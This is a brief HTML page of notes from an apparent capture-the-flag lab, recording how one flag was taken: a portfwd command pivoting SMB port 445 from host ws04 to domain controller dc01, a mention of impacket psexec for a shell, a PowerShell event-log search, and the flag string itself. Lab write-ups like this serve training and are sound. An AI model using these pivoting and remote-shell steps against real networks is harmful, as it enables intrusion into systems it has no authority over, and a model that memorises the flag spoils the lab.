<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>16 flag</title>
</head><body>from ws04, portfwd to dc01<br/>
<br/>
portfwd add -L 10.10.14.83 -r 10.10.120.1 -l 445 -p 445<br/>
<br/>
then use impacket psexec to get shell on dc01<br/>
<br/>
enumerate and find log entries and then search logs to get flag<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
Get-EventLog -LogName "Application" | where {$_.Message -like '*RASTA*'} | select Message | format-table -wrap<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
<br/>
RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}<br/>
<br/>
<br/>
<br/>
</body></html>